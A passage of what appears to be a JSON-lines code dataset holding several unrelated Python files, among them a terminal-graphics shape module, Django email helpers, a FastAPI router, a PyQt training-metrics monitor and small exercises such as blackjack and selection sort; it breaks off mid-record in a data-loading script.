__setitem__(self, pos, value):\n \"\"\"\n Values set for each pixel are: character - only spaces (0x20) or \"non-spaces\" are\n taken into account for PalettedShape\n \"\"\"\n pos = V2(pos)\n self.dirty_mark_pixel(pos)\n\n force_transparent_ink = getattr(self.context, \"force_transparent_ink\", False)\n\n #offset = self.get_data_offset(pos)\n if pos not in self.rect:\n return\n if isinstance(value, Pixel):\n value = value.get_values(self.context, self.PixelCls.capabilities)\n else:\n if isinstance(value, bool):\n value = self.context.char if value else EMPTY\n value = [value] if isinstance(value, str) or value is TRANSPARENT else list(value)\n value += [\n self.context.color,\n self.context.background,\n self.context.effects,\n ][len(value) - 1 :]\n\n #####################\n # Apply pre-transformers: backed in transformations specified in context.\n #####################\n\n if self.context.pretransformers:\n value = self.context.pretransformers.process(self, pos, self.PixelCls(*value))\n\n ############\n # Check final width (after have to apply transformation effect)\n ###########\n offset2 = None\n\n effects = value[3] if (value[3] != TRANSPARENT or force_transparent_ink) else self.get_raw(pos)[3]\n transform_effects = (effects & UNICODE_EFFECTS) if effects != TRANSPARENT else Effects.none\n # FIXME: check for unicode combining gliphs\n final_char = value[0]\n if isinstance(final_char, (bool, int)):\n final_char = self.context.char if final_char else EMPTY\n if final_char == CONTINUATION:\n if self.get_raw(pos)[0] == CONTINUATION:\n # we are likely being blitted from a source with matching parameters.\n # attributes are already set in this cell from\n # previous character setting\n return\n\n if final_char not in (TRANSPARENT, CONTINUATION):\n if transform_effects:\n final_char = translate_chars(value[0], transform_effects)\n double_width = char_width(final_char) == 2\n if double_width:\n if not getattr(self.context, \"text_rendering_styled\", None) == 1:\n if pos[0] == self.width - 1: # Right shape edge\n double_width = False\n else:\n offset2 = pos[0] + 1\n else:\n # a character sequence of styled-text is being rendered.\n if pos[0] == 0:\n # FIXME: if a double-width char hits the edge in RTL\n # printing, this have to be handled in higher level\n pass\n if self.context.direction == Directions.LEFT:\n # EXPERIMENTAL: change actual target in this\n # situation (rendering_text and going left)\n # and leave a CONTINUATION marker on the target position.\n offset2 = pos[0]\n pos = list(pos)\n pos[0] -= 1\n else:\n if pos[0] == self.width - 1: # Right shape edge\n double_width = False\n offset2 = pos[0] + 1\n else:\n double_width = False\n self.context.shape_lastchar_was_double = double_width\n self._raw_setitem(pos, value, force_transparent_ink, double_width, offset2)\n\n def _raw_setitem(self, pos, value, force_transparent_ink=False, double_width=False, offset2=None):\n pixel = self.get_raw(pos)\n if offset2:\n pixel2 = self.get_raw((offset2, pos[1]))\n for i, component in enumerate(value):\n # the idea is that \"TRANSPARENT\" won't affect the corresponding component.\n # but \"force_transparent_ink\" can set the value of the component itself to\n # be the \"transparent\" special marker\n if component is not TRANSPARENT or force_transparent_ink:\n pixel[i] = component\n if double_width:\n pixel2[i] = component if i != 0 else CONTINUATION\n if self.undo_active:\n self.data[pos] = pixel\n\n if offset2:\n self.data[offset2, pos[1]] = pixel2\n\n def _resize_data(self, new_size):\n return\n\n @classmethod\n def promote(cls, other_shape, resolution=None):\n \"\"\"Makes a FullShape copy of the other shape\n\n This allows the new shape to be used with Transformers,\n Sprites, and other elements that might not be supported\n in the other shape classes\n \"\"\"\n\n if not resolution:\n new_shape = cls.new(other_shape.size)\n draw = new_shape.draw\n else:\n size = size_in_blocks(other_shape.size, resolution)\n new_shape = cls.new(size)\n draw = getattr(new_shape, resolution).draw\n\n draw.blit((0,0), other_shape)\n\n return new_shape\n\nclass ShalowShapeRepr:\n def __init__(self, original: Shape):\n \"\"\"The final visible pixel data of a shape as a simple pickleable object\n\n This can be pickled into disk, and later restored into a new shape.\n\n Warning: This class applies the visible effects and otherwise ignore text-plane information,\n marks, sprites and any Transformers. A simple Python object is written to disk,\n which can be retrieved.\n \"\"\"\n self.size = original.size\n self.data = []\n self.cls = original.__class__\n for pos in Rect(self.size).iter_cells():\n self.data.append(tuple(original[pos]))\n\n def restore(self):\n \"\"\"Recreates a Shape of the original class with the flattened data\"\"\"\n # FIXME: Palleted shapes do not save Palette information\n shape = self.cls.new(self.size)\n for pos, value in zip(Rect(self.size).iter_cells(), self.data):\n shape[pos] = value\n return shape\n\n\n\ndef shape(data, color_map=None, promote=False, resolution=None, **kwargs):\n \"\"\"Factory for shape objects\n\n Args:\n - data (Filepath to image, open file, image data as text or list of strings)\n - color_map (optional mapping): color map to be used for the image - mapping characters to RGB colors.\n - promote (boolean): Whether to force resulting shape to a FullShape (defaults to False)\n - resolution (str): If promote is True, resolution namespace to use on blitting to\n FullShape (\"square\", \"high\", \"square\")\n - **kwargs: parameters passed transparently to the selected shape class\n\n Based on inferences on the data attribute, selects\n the appropriate Shape subclass to handle the \"data\" attribute.\n That is:\n given a string without newlines, it is interpreted as a\n filepath, and if PIL is installed, an RGB \"ImageShape\"\n class is used to read the image data. If text with \"\\n\"\n is passed in, an PalettedShape is used to directly use\n the passed data as pixels.\n\n Returns an instance of the selected class with the data set.\n\n\n \"\"\"\n if (\n isinstance(data, str)\n and \"\\n\" not in data\n or isinstance(data, Path)\n or hasattr(data, \"read\")\n ):\n if hasattr(data, \"read\"):\n name = Path(getattr(data, \"name\", \"stream\"))\n else:\n name = Path(data)\n suffix = name.suffix.strip(\".\").lower()\n if suffix in \"pnm ppm pgm\".split():\n cls = PGMShape\n elif suffix == \"snapshot\": # FIXME: find a better way to detect a pickle-file\n import pickle\n obj = pickle.load(open(data, \"rb\"))\n # FIXME: in the future full shapes may be pickled, with no need to call \"restore\" method\n return obj.restore()\n\n else:\n cls = ImageShape\n elif PILImage and isinstance(data, PILImage.Image):\n cls = ImageShape\n elif isinstance(data, (list, str)):\n cls = PalettedShape\n elif isinstance(data, Shape):\n return data\n elif isinstance(data, tuple) and len(data) == 2:\n return FullShape.new(data, **kwargs)\n else:\n raise NotImplementedError(\"Could not pick a Shape class for given arguments!\")\n result = cls(data, color_map, **kwargs)\n if promote:\n result = FullShape.promote(result, resolution=resolution)\n return result\n","repo_name":"jsbueno/terminedia","sub_path":"terminedia/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":55636,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"27451012848","text":"# -*- coding: utf-8 -*-\nimport os\nimport logging\nimport logging.config\n\nLOGGING_CONFIG = {\n\t'version': 1,\n\t'disable_existing_loggers': False,\n\t'formatters': {\n\t\t'verbose': {\n\t\t\t'format': '%(asctime)s %(levelname)s %(module)s - %(message)s'\n\t\t},\n\t\t'simple': {\n\t\t\t'format': '%(levelname)s %(message)s'\n\t\t},\n\t},\n\t'handlers': {\n\t\t'file': {\n\t\t\t'level': 'INFO',\n\t\t\t'class': 'logging.handlers.RotatingFileHandler',\n\t\t\t'filename': os.path.join(os.path.dirname(__file__), '../logs/monitor.log'),\n\t\t\t'maxBytes': 1048576,\n\t\t\t'backupCount': 3,\n\t\t\t'formatter' : 'verbose'\n\t\t},\n\t\t'console': {\n\t\t\t'level': 'DEBUG',\n\t\t\t'class': 'logging.StreamHandler',\n\t\t\t'formatter' : 'simple'\n\t\t},\n\t},\n\t'loggers': {\n\t\t'root': {\n\t\t\t'handlers': ['console', 'file'],\n\t\t\t'level': 'DEBUG',\n\t\t\t'propagate': True,\n\t\t},\n\t}\n}\n\nlogging.config.dictConfig(LOGGING_CONFIG) \nlog = logging.getLogger('root')\n\n","repo_name":"streambo/pymisc","sub_path":"monitor/utils/rwlogging.py","file_name":"rwlogging.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73658505128","text":"import gc\nimport sys\n\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nfrom math import ceil as math_ceil\n\nfrom . import server_config\n\n\n# utils\ndef get_next_url(request, url):\n \"\"\"If request has a 'next' key, return it. Otherwise, return url.\"\"\"\n if request.GET.get('next', None):\n return request.GET['next']\n return url\n\n\ndef get_obj_size(obj): # https://stackoverflow.com/a/53705610/\n marked = {id(obj)}\n obj_q = [obj]\n sz = 0\n while obj_q:\n sz += sum(map(sys.getsizeof, obj_q))\n all_refr = ((id(o), o) for o in gc.get_referents(*obj_q))\n new_refr = {o_id: o for o_id, o in all_refr\n if o_id not in marked\n and not isinstance(o, type)}\n obj_q = new_refr.values()\n marked.update(new_refr.keys())\n return sz\n\n\ndef kb_to_bytes(kb):\n \"\"\"Converts bytes to kilobytes. Rounds up to the nearest integer.\"\"\"\n if not isinstance(kb, (int, float)):\n raise TypeError(\"kb must be a numeric value\")\n return math_ceil(kb * 1024)\n\n\ndef bytes_to_kb(bt):\n \"\"\"Converts kilobytes to bytes. Rounds up to the nearest integer.\"\"\"\n if not isinstance(bt, (int, float)):\n raise TypeError(\"bt must be a numeric value\")\n return math_ceil(bt / 1024)\n\n\n# email\ndef send_test_email(recipient):\n subject = \"Test Message\"\n body = \"Test message sent successfully!\"\n sender = server_config.SERVER_EMAIL\n recipient = [recipient]\n return send_mail(subject, body, sender, recipient)\n\n\ndef send_contact_us_email(name, from_email, message):\n subject = f\"{server_config.PROJECT_NAME} Contact Form: Submitted by {name}\"\n body = f\"Name: {name}\\nEmail: {from_email}\\n\\nMessage: {message}\"\n sender = server_config.SERVER_EMAIL\n recipient = [server_config.CONTACT_FORM_EMAIL_RECIPIENT]\n return send_mail(subject, body, sender, recipient)\n\n\ndef send_welcome_email(recipient, activation_code):\n subject = f\"{server_config.PROJECT_NAME}: Activate your account\"\n body = f\"Welcome to {server_config.PROJECT_NAME}!\\n\\n\" +\\\n \"Please visit the following link to activate your account:\\n\\n\" +\\\n server_config.BACKEND_SERVER_URL + \\\n reverse('users:user_activate', kwargs={\n 'activation_code': activation_code})\n sender = server_config.SERVER_EMAIL\n recipient = [recipient]\n return send_mail(subject, body, sender, recipient)\n\n\ndef send_email_update_email(recipient, activation_code):\n subject = f\"{server_config.PROJECT_NAME}: Confirm your new email address\"\n body = \"Please visit the following link to confirm your \" +\\\n \"new email address:\\n\\n\" + server_config.BACKEND_SERVER_URL + \\\n reverse('users:user_update_email_confirm',\n kwargs={'activation_code': activation_code})\n sender = server_config.SERVER_EMAIL\n recipient = [recipient]\n return send_mail(subject, body, sender, recipient)\n\n\ndef send_user_username_recover_email(email, username):\n subject = f\"{server_config.PROJECT_NAME}: Forgot your username?\"\n body = f\"Your username is '{username}'.\\n\\n\" +\\\n \"You may login to your account here: \" +\\\n server_config.BACKEND_SERVER_URL + reverse('users:login')\n sender = server_config.SERVER_EMAIL\n recipient = [email]\n return send_mail(subject, body, sender, recipient)\n","repo_name":"arcanemachine/django-jsonsaver","sub_path":"django_jsonsaver/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39416259236","text":"from fastapi import APIRouter, Body\n\nfrom animais.AnimalRequest import AnimalRequest\nfrom animais.AnimalResponse import animalLista\n\nrouter = APIRouter(\n prefix=\"/animais\",\n)\n\n@router.get('')\nasync def getAllAnimais():\n return animalLista\n\n@router.get('/{animalID}')\nasync def getOneAnimalByID(animalID: int):\n for indice, animal in enumerate(animalLista):\n if animal.ID == animalID:\n return animal\n\n return animalLista\n\n@router.post('')\nasync def insertAnimal(animalRequest: AnimalRequest = Body(...)):\n animalLista.append(animalRequest)\n return animalLista\n\n@router.put('')\nasync def updateAnimal(animalRequest: AnimalRequest = Body(...)):\n for indice, animal in enumerate(animalLista):\n if animal.ID == animalRequest.ID:\n animalLista[indice] = animalRequest\n\n return animalLista\n\n@router.delete('/{animalID}')\nasync def deleteAnimal(animalID: int):\n for indice, animal in enumerate(animalLista):\n if animal.ID == animalID:\n del animalLista[indice]\n\n return animalLista\n\n","repo_name":"renanas/PytShop","sub_path":"animais/AnimalController.py","file_name":"AnimalController.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2505187622","text":"#!/usr/bin/python\n\nimport re\n\n\ndef main():\n with open('input.txt') as inputfile:\n metadictionary = {}\n directories = []\n location = ''\n for i, line in enumerate(inputfile):\n line = line.replace('\\n', '')\n if line.startswith('$ cd'):\n newDir = line.split(' ')[-1]\n if directories:\n path = f'{location}/{newDir}' if location != '/' else f'/{newDir}'\n else:\n path = newDir\n fullpath = re.sub(\n r'/[a-z]+/\\.\\.', '', path, re.IGNORECASE\n )\n location = fullpath\n if fullpath in metadictionary:\n continue\n directoryDict = {\n 'path': fullpath,\n 'size': 0,\n }\n directories.append(directoryDict)\n metadictionary[fullpath] = len(directories) - 1\n elif line.startswith('$') or line.startswith('dir'):\n continue\n else:\n filesize = int(line.split(' ')[0])\n directories[metadictionary[location]]['size'] += filesize\n parentdirs = ['/'] + directories[-1]['path'].split('/')[1:-1]\n if location != '/':\n for j in range(len(parentdirs)): # :/\n parentpath = '/'+'/'.join(parentdirs[1:j+1])\n directories[metadictionary[parentpath]]['size'] += filesize\n\n candidateDirsTotalSize = 0\n for directory in directories:\n if directory['size'] <= 100000:\n candidateDirsTotalSize += directory['size']\n print(f'Part1: {candidateDirsTotalSize}')\n\n freeSpace = 70000000 - directories[metadictionary['/']]['size']\n neededSpace = 30000000 - freeSpace\n chosen = directories[metadictionary['/']]\n for directory in directories:\n if directory['size'] < neededSpace:\n continue\n elif directory['size'] < chosen['size']:\n chosen = directory\n print(f\"Part 2: {chosen['size']}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eckuru/aoc2022","sub_path":"7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26791438256","text":"import unittest\r\nfrom Coin import coinAPI # наша функция находиться в папке Coin в файле coinAPI.py\r\n\r\nclass coinTest(unittest.TestCase):\r\n\tdef test_coin(self):\r\n\t\tresp_time, data10 = coinAPI.coinAPIres() # получаем время отклика и данные\r\n\t\tself.assertLess(resp_time, 0.5) # проверяем на условие: время отклика менее 500мс\r\n\t\t\r\nif __name__ == '__main__':\r\n\tunittest.main()","repo_name":"Ruslan515/TestTaskPython","sub_path":"finTech_01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35174153556","text":"import numpy as np\nfrom yampex import plot, annotate\nfrom yampex.util import sub\n\n\nclass Figure(object):\n verbose = True\n \n def __init__(self):\n annotate.Annotator.verbose = True\n self.p = plot.Plotter(1, width=500, height=500)\n\n def plot(self):\n with self.p as sp:\n sp.use_grid()\n sp.add_annotation(0, \"Lower\")\n sp.add_annotation(1, \"Midway Point\")\n sp.add_annotation(2, \"Upper\")\n sp([-1, 0, +1], [-1, 0, +1])\n self.p.show()\n \n\ndef run():\n # Plot the curves\n Figure().plot()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"edsuom/yampex","sub_path":"yampex/examples/annotate-simple.py","file_name":"annotate-simple.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"22794351120","text":"\"\"\"Module for creating gui.\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtWidgets import QHBoxLayout\nfrom PyQt5.QtWidgets import QVBoxLayout\nfrom PyQt5.QtWidgets import QGroupBox\nfrom PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtCore import pyqtSlot\nimport pyqtgraph\nfrom pyqtgraph.Qt import QtGui\nfrom pyqtgraph.Qt import QtCore\n\n\nclass Main(QWidget):\n def __init__(self):\n super().__init__()\n\n # Define variables for saving metrics.\n self.epoch = []\n self.train_accuracy = []\n self.train_loss = []\n self.validation_accuracy = []\n self.validation_loss = []\n\n # Create layout.\n hbox1 = QHBoxLayout()\n hbox2 = QHBoxLayout()\n hbox3 = QHBoxLayout()\n\n vbox = QVBoxLayout()\n\n group_box1 = QVBoxLayout()\n group_box2 = QVBoxLayout()\n group_box3 = QVBoxLayout()\n group_box4 = QVBoxLayout()\n group_box5 = QVBoxLayout()\n\n # Set default font.\n font_tick = QtGui.QFont(\"Bahnschrift SemiLight\", 8)\n font = QtGui.QFont(\"Bahnschrift SemiLight\", 12)\n font.setBold(True)\n self.setFont(font)\n\n # Generate 4 graphs and set x axis type string.\n self.stringaxis_train_accuracy = pyqtgraph.AxisItem(orientation=\"bottom\")\n self.stringaxis_train_loss = pyqtgraph.AxisItem(orientation=\"bottom\")\n self.stringaxis_validation_accuracy = pyqtgraph.AxisItem(orientation=\"bottom\")\n self.stringaxis_validation_loss = pyqtgraph.AxisItem(orientation=\"bottom\")\n\n self.train_accuracy_graph = pyqtgraph.PlotWidget(\n axisItems={\"bottom\": self.stringaxis_train_accuracy}\n )\n self.train_loss_graph = pyqtgraph.PlotWidget(\n axisItems={\"bottom\": self.stringaxis_train_loss}\n )\n self.validation_accuracy_graph = pyqtgraph.PlotWidget(\n axisItems={\"bottom\": self.stringaxis_validation_accuracy}\n )\n self.validation_loss_graph = pyqtgraph.PlotWidget(\n axisItems={\"bottom\": self.stringaxis_validation_loss}\n )\n\n # Generate graph title.\n self.train_accuracy_graph.setTitle(\"Train Accuracy\", color=\"#828282\", size=\"12pt\")\n self.train_loss_graph.setTitle(\"Train Loss\", color=\"#828282\", size=\"12pt\")\n self.validation_accuracy_graph.setTitle(\"Validation Accuracy\", color=\"#828282\", size=\"12pt\")\n self.validation_loss_graph.setTitle(\"Validation Loss\", color=\"#828282\", size=\"12pt\")\n\n # Set graph title font.\n self.train_accuracy_graph.getPlotItem().titleLabel.item.setFont(font)\n self.train_loss_graph.getPlotItem().titleLabel.item.setFont(font)\n self.validation_accuracy_graph.getPlotItem().titleLabel.item.setFont(font)\n self.validation_loss_graph.getPlotItem().titleLabel.item.setFont(font)\n\n # Set background color of gaphs.\n self.train_accuracy_graph.setBackground((240, 240, 240))\n self.train_loss_graph.setBackground((240, 240, 240))\n self.validation_accuracy_graph.setBackground((240, 240, 240))\n self.validation_loss_graph.setBackground((240, 240, 240))\n\n # Set graph pen.\n self.train_accuracy_curve = self.train_accuracy_graph.plot(\n pen=pyqtgraph.mkPen(color=(203, 26, 126), width=3, style=QtCore.Qt.SolidLine)\n )\n self.train_loss_curve = self.train_loss_graph.plot(\n pen=pyqtgraph.mkPen(color=(44, 106, 180), width=3, style=QtCore.Qt.DotLine)\n )\n self.validation_accuracy_curve = self.validation_accuracy_graph.plot(\n pen=pyqtgraph.mkPen(color=(145, 122, 184), width=4, style=QtCore.Qt.SolidLine)\n )\n self.validation_loss_curve = self.validation_loss_graph.plot(\n pen=pyqtgraph.mkPen(color=(203, 26, 126), width=3, style=QtCore.Qt.SolidLine)\n )\n\n # Set style for name of axis.\n label_style = {\"color\": \"#828282\", \"font-size\": \"9pt\"}\n\n # Set name for axis.\n self.train_accuracy_graph.setLabel(\"left\", \"Train Accuracy\", **label_style)\n self.train_loss_graph.setLabel(\"left\", \"Train Loss\", **label_style)\n self.validation_accuracy_graph.setLabel(\"left\", \"Validation Accuracy\", **label_style)\n self.validation_loss_graph.setLabel(\"left\", \"Validation Loss\", **label_style)\n self.train_accuracy_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.train_loss_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.validation_accuracy_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n self.validation_loss_graph.setLabel(\"bottom\", \"Epoch\", **label_style)\n\n # Set font and gradation of axis.\n self.train_accuracy_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_loss_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.validation_accuracy_graph.getAxis(\"bottom\").setStyle(\n tickFont=font_tick, tickTextOffset=6\n )\n self.validation_loss_graph.getAxis(\"bottom\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_accuracy_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.train_loss_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n self.validation_accuracy_graph.getAxis(\"left\").setStyle(\n tickFont=font_tick, tickTextOffset=6\n )\n self.validation_loss_graph.getAxis(\"left\").setStyle(tickFont=font_tick, tickTextOffset=6)\n\n # Generate Data Indicator Group Box.\n self.groupbox_epoch = QGroupBox(\"Epoch\")\n self.groupbox_train_accuracy = QGroupBox(\"Train Accuracy\")\n self.groupbox_train_loss = QGroupBox(\"Train Loss\")\n self.groupbox_validation_accuracy = QGroupBox(\"Validation Accuracy\")\n self.groupbox_validation_loss = QGroupBox(\"Validation Loss\")\n\n # Generate Data Indicator Label.\n self.label_epoch = QLabel(\"0\", self)\n self.label_train_accuracy = QLabel(\"0\", self)\n self.label_train_loss = QLabel(\"0\", self)\n self.label_validation_accuracy = QLabel(\"0\", self)\n self.label_validation_loss = QLabel(\"0\", self)\n\n # Arrange Data Indicator central.\n self.label_epoch.setAlignment(Qt.AlignCenter)\n self.label_train_accuracy.setAlignment(Qt.AlignCenter)\n self.label_train_loss.setAlignment(Qt.AlignCenter)\n self.label_validation_accuracy.setAlignment(Qt.AlignCenter)\n self.label_validation_loss.setAlignment(Qt.AlignCenter)\n\n # Set background color and border of Data Indicator.\n self.label_epoch.setStyleSheet(\n \"color:rgb(0, 0, 0);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_train_accuracy.setStyleSheet(\n \"color:rgb(203, 26, 126);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_train_loss.setStyleSheet(\n \"color:rgb(203, 26, 126);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_validation_accuracy.setStyleSheet(\n \"color:rgb(44, 106, 180);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n self.label_validation_loss.setStyleSheet(\n \"color:rgb(44, 106, 180);\"\n \"background-color:rgb(250,250,250);\"\n \"border-style: solid;\"\n \"border-width: 1px;\"\n \"border-color: rgb(200,200,200);\"\n \"border-radius: 5px\"\n )\n\n # Vertically locate Group Box and Label.\n group_box1.addWidget(self.label_epoch)\n group_box2.addWidget(self.label_train_accuracy)\n group_box3.addWidget(self.label_train_loss)\n group_box4.addWidget(self.label_validation_accuracy)\n group_box5.addWidget(self.label_validation_loss)\n\n self.groupbox_epoch.setLayout(group_box1)\n self.groupbox_train_accuracy.setLayout(group_box2)\n self.groupbox_train_loss.setLayout(group_box3)\n self.groupbox_validation_accuracy.setLayout(group_box4)\n self.groupbox_validation_loss.setLayout(group_box5)\n\n # Group horizontally. (1 row: 2 Graphs), (2 row : 2 Graphs), (3 row : 10 Labels(Data Indicator))\n hbox1.addWidget(self.train_accuracy_graph)\n hbox1.addWidget(self.train_loss_graph)\n\n hbox2.addWidget(self.validation_accuracy_graph)\n hbox2.addWidget(self.validation_loss_graph)\n\n hbox3.addWidget(self.groupbox_epoch)\n hbox3.addWidget(self.groupbox_train_accuracy)\n hbox3.addWidget(self.groupbox_train_loss)\n hbox3.addWidget(self.groupbox_validation_accuracy)\n hbox3.addWidget(self.groupbox_validation_loss)\n\n # Group grouped widgets vertically.\n vbox.addLayout(hbox1)\n vbox.addLayout(hbox2)\n vbox.addLayout(hbox3)\n\n # Create window and arrange layout.\n self.setLayout(vbox)\n self.setGeometry(100, 100, 1300, 500)\n self.setWindowTitle(\"Accuracy & Loss Monitoring\")\n\n # Make range of axis x.\n self.train_accuracy_graph.enableAutoRange(axis=\"x\")\n self.train_loss_graph.enableAutoRange(axis=\"x\")\n self.validation_accuracy_graph.enableAutoRange(axis=\"x\")\n self.validation_loss_graph.enableAutoRange(axis=\"x\")\n\n # Make range of axis y.\n self.train_accuracy_graph.enableAutoRange(axis=\"y\")\n self.train_loss_graph.enableAutoRange(axis=\"y\")\n self.validation_accuracy_graph.enableAutoRange(axis=\"y\")\n self.validation_loss_graph.enableAutoRange(axis=\"y\")\n\n self.timer = QTimer()\n self.timer.setInterval(1)\n self.timer.timeout.connect(self.update)\n self.timer.start()\n\n self.show()\n\n @pyqtSlot()\n def update(self):\n self.train_accuracy_curve.setData(self.epoch, self.train_accuracy)\n self.train_loss_curve.setData(self.epoch, self.train_loss)\n self.validation_accuracy_curve.setData(self.epoch, self.validation_accuracy)\n self.validation_loss_curve.setData(self.epoch, self.validation_loss)\n\n self.label_epoch.setText(str(self.epoch[-1]))\n self.label_train_accuracy.setText(str(self.train_accuracy[-1]))\n self.label_train_loss.setText(str(self.train_loss[-1]))\n self.label_validation_accuracy.setText(str(self.validation_accuracy[-1]))\n self.label_validation_loss.setText(str(self.validation_loss[-1]))\n\n def update_metrics(\n self, epoch, train_accuracy, train_loss, validation_accuracy, validation_loss\n ):\n self.epoch = epoch\n self.train_accuracy = train_accuracy\n self.train_loss = train_loss\n self.validation_accuracy = validation_accuracy\n self.validation_loss = validation_loss\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = Main()\n sys.exit(app.exec_())\n","repo_name":"james20140802/digit_recognizer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":11460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38016036335","text":"#实现的原理是在未排好序的范围内找到最小的值,然后与该范围头部元素进行交换,从而完成整个数组的排序\ndef selectionSort(arr):\n if arr is None or len(arr) == 0:\n return\n for i in range(len(arr) - 1):\n min_index = i\n for j in range(i+1, len(arr)):\n if arr[min_index] > arr[j]:\n min_index = j\n arr[min_index], arr[i] = arr[i], arr[min_index]\n\n\nif __name__ == '__main__':\n array = [3, 5, 6, 1, 3, 7, 8, 34, 2, 9, 4]\n selectionSort(array)\n print(array)","repo_name":"szhmery/algorithms","sub_path":"sorting/SelectionSort.py","file_name":"SelectionSort.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29286405295","text":"import random\n\n\ndef main():\n deck = create_deck()\n points1 = 0\n points2 = 0\n while points1 < 21 and points2 < 21:\n deck, points1 = deal(deck, points1)\n deck, points2 = deal(deck, points2)\n print(f'first player {points1}\\n'\n f'second player {points2}')\n\ndef create_deck():\n deck = {'Ace of Spades': 1, '2 of Spades': 2, '3 of Spades': 3, '4 of Spades': 4, '5 of Spades': 5,\n '6 of Spades': 6, '7 of Spades': 7, '8 of Spades': 8, '9 of Spades': 9, '10 of Spades': 10,\n 'Jack of Spades': 10, 'Queen of Spades': 10, 'King of Spades': 10,\n 'Ace of Hearts': 1, '2 of Hearts': 2, '3 of Hearts': 3, '4 of Hearts': 4, '5 of Hearts': 5,\n '6 of Hearts': 6, '7 of Hearts': 7, '8 of Hearts': 8, '9 of Hearts': 9, '10 of Hearts': 10,\n 'Jack of Hearts': 10, 'Queen of Hearts': 10, 'King of Hearts': 10,\n 'Ace of Clubs': 1, '2 of Clubs': 2, '3 of Clubs': 3, '4 of Clubs': 4, '5 of Clubs': 5,\n '6 of Clubs': 6, '7 of Clubs': 7, '8 of Clubs': 8, '9 of Clubs': 9, '10 of Clubs': 10,\n 'Jack of Clubs': 10, 'Queen of Clubs': 10, 'King of Clubs': 10,\n 'Ace of Diamonds': 1, '2 of Diamonds': 2, '3 of Diamonds': 3, '4 of Diamonds': 4, '5 of Diamonds': 5,\n '6 of Diamonds': 6, '7 of Diamonds': 7, '8 of Diamonds': 8, '9 of Diamonds': 9, '10 of Diamonds': 10,\n 'Jack of Diamonds': 10, 'Queen of Diamonds': 10, 'King of Diamonds': 10}\n return deck\n\n\ndef deal(deck, points):\n card = random.choice(list(deck))\n if points > 10 and deck.get(card) == 11:\n points += 1\n else:\n points += deck.get(card)\n deck.pop(card)\n return deck, points\n\n\nmain()\n","repo_name":"lebrodequin/Starting_out_with_python-_5th_edition._Solutions","sub_path":"9/9. Blackjack Simulation.py","file_name":"9. Blackjack Simulation.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7097550141","text":"import os\nimport pickle\nimport cv2\nimport numpy as np\nimport scipy.fftpack as FFT\n\nnp.set_printoptions(suppress=True)\n\n\ndef dense_to_one_hot(labels_dense, num_classes):\n \"\"\"Convert class labels from scalars to one-hot vectors.\"\"\"\n labels_one_hot = []\n for i in range(num_classes):\n if i == labels_dense:\n labels_one_hot.append(1)\n else:\n labels_one_hot.append(0)\n return np.array(labels_one_hot)\n\n\ndef pickle_2_img_single(data_file):\n '''load data from pkl'''\n\n if not os.path.exists(data_file):\n print('file {0} not exists'.format(data_file))\n exit()\n with open(data_file, 'rb') as f:\n data = pickle.load(f)\n total_x1, total_y = [], []\n for i in range(len(data)):\n x1 = []\n x2 = []\n yl = []\n print(len(data[i]['img']))\n for j in range(len(data[i]['labels'])):\n img = data[i]['img'][j]\n img = FFT.dctn(img)\n img_neu = data[i]['img_neu'][j]\n img_neu = FFT.dctn(img_neu)\n diff = img - img_neu\n lms = data[i]['lms'][j]\n lms = np.array(lms)\n '''\n img = 